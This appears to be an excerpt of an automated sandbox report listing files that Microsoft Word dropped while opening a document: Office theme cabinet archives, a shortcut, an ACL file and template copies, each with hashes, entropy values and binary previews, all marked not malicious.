                                    Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                    C:\Users\user\AppData\Local\Temp\cabA38C.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1065873
                                    Entropy (8bit):7.998277814657051
                                    Encrypted:true
                                    SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                    MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                    SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                    SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                    SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                    Malicious:false
                                    Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                    C:\Users\user\AppData\Local\Temp\cabA504.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):953453
                                    Entropy (8bit):7.99899040756787
                                    Encrypted:true
                                    SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                    MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                    SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                    SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                    SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                    Malicious:false
                                    Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                    C:\Users\user\AppData\Local\Temp\cabA505.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1310275
                                    Entropy (8bit):7.9985829899274385
                                    Encrypted:true
                                    SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                    MD5:9C9F49A47222C18025CC25575337A965
                                    SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                    SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                    SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                    Malicious:false
                                    Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                    C:\Users\user\AppData\Local\Temp\cabA545.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1097591
                                    Entropy (8bit):7.99825462915052
                                    Encrypted:true
                                    SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                    MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                    SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                    SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                    SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                    Malicious:false
                                    Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                    C:\Users\user\AppData\Local\Temp\cabA634.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1766185
                                    Entropy (8bit):7.9991290831091115
                                    Encrypted:true
                                    SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                    MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                    SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                    SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                    SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                    Malicious:false
                                    Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                    C:\Users\user\AppData\Local\Temp\cabA6D2.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1881952
                                    Entropy (8bit):7.999066394602922
                                    Encrypted:true
                                    SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                    MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                    SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                    SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                    SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                    Malicious:false
                                    Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                    C:\Users\user\AppData\Local\Temp\cabAAEB.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):2591108
                                    Entropy (8bit):7.999030891647433
                                    Encrypted:true
                                    SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                    MD5:BEB12A0464D096CA33BAEA4352CE800F
                                    SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                    SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                    SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                    Malicious:false
                                    Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                    C:\Users\user\AppData\Local\Temp\cabAC55.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):2527736
                                    Entropy (8bit):7.992272975565323
                                    Encrypted:true
                                    SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                    MD5:F256ACA509B4C6C0144D278C7036B0A8
                                    SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                    SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                    SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                    Malicious:false
                                    Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                    C:\Users\user\AppData\Local\Temp\cabAF35.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):3256855
                                    Entropy (8bit):7.996842935632312
                                    Encrypted:true
                                    SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                    MD5:8867BDF5FC754DA9DA6F5BA341334595
                                    SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                    SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                    SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                    Malicious:false
                                    Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                    C:\Users\user\AppData\Local\Temp\cabB020.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):3417042
                                    Entropy (8bit):7.997652455069165
                                    Encrypted:true
                                    SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                    MD5:749C3615E54C8E6875518CFD84E5A1B2
                                    SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                    SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                    SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                    Malicious:false
                                    Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):1.2389205950315936
                                    Encrypted:false
                                    SSDEEP:3:PpSh/t:Ah/
                                    MD5:175C41C40B5305D209E43D1F7A6D7639
                                    SHA1:3B1A9F5847ABAFD152ADB4C87FBE5434E125EF74
                                    SHA-256:1D3DA5A82B02CB6E1FF75F50EBF916CD9566EA254006DDE2EA947635668F0516
                                    SHA-512:2C518D8F68A2A2637D55D60B62E6539D3FBC1ACA2ABC061E2297EBCEB5C8A6E7DD764AF42008A93FC6978C1E984C0CE29787A7C8B900DF7ED34EDC630C13ED32
                                    Malicious:false
                                    Preview:.....L........................

                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\???????.LNK

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 18 14:23:14 2024, mtime=Wed Dec 18 14:23:26 2024, atime=Wed Dec 18 14:23:14 2024, length=11302, window=hide
                                    Category:dropped
                                    Size (bytes):589
                                    Entropy (8bit):4.92218747978544
                                    Encrypted:false
                                    SSDEEP:6:4xtQl3988kSlWUZ076n2ChzwXIMtxmNJAaRaa5ZsFWjc2ChzwBRIWjc2Chzw2iQ/:8D8zXnTUSpanF/Tz/T0zhmV
                                    MD5:863DF5B96E47D4B298686D9BA13A41F1
                                    SHA1:CE2337E31ADE969F3DDCFFE93C52A0A11C116932
                                    SHA-256:DEA0168EF51F2583D31CE9570E2E6BF720239345297FD68898E50C1F7A989508
                                    SHA-512:5EB58825B9B59F231E6B342DA4426E36624FAD903A5E8183392AB08B49F4CE6956F96DCE699585A6A9DBC90A21677B6D6D9AF3AAC0FD3F16E313262384038F27
                                    Malicious:false
                                    Preview:L..................F.... ....1..`Q......`Q......`Q..&,......................f.d.2.&,...Y.z .9C7B~1.DOC..J......Y.z.Y.z...............................Q.y)R'Y<y.S..d.o.c.x...........$.......$...5...........Z................F.......C:\Users\user\Desktop\???????.docx.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.......#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.`.......X.......928100...........hT..CrF.f4... ..2=.b...,...W..hT..CrF.f4... ..2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Generic INItialization configuration [folders]
                                    Category:dropped
                                    Size (bytes):49
                                    Entropy (8bit):3.833016601078342
                                    Encrypted:false
                                    SSDEEP:3:HLRb6lm4Z8b6lv:HLRd0
                                    MD5:5225F92FC7C6204602FACAD1AFB9A0A2
                                    SHA1:1E04A8C70C9468DDB909077FF0226624CB35EDD9
                                    SHA-256:44D7281091105C2C6DFD80EB0E3291E5E0E1FC07E8F0F011AD83B37F3C0E9F9B
                                    SHA-512:14B51C5F0A4C68831243534869DDA3D839E5BF6C00AE18E4CA940D9251D65A911700B10899E8B7B9E1A80B6E85EA609DB36CAD7D5EAFF51EF261086B44950B33
                                    Malicious:false
                                    Preview:[misc]..???????.LNK=0..[folders]..???????.LNK=0..

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):562113
                                    Entropy (8bit):7.67409707491542
                                    Encrypted:false
                                    SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                    MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                    SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                    SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                    SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1649585
                                    Entropy (8bit):7.875240099125746
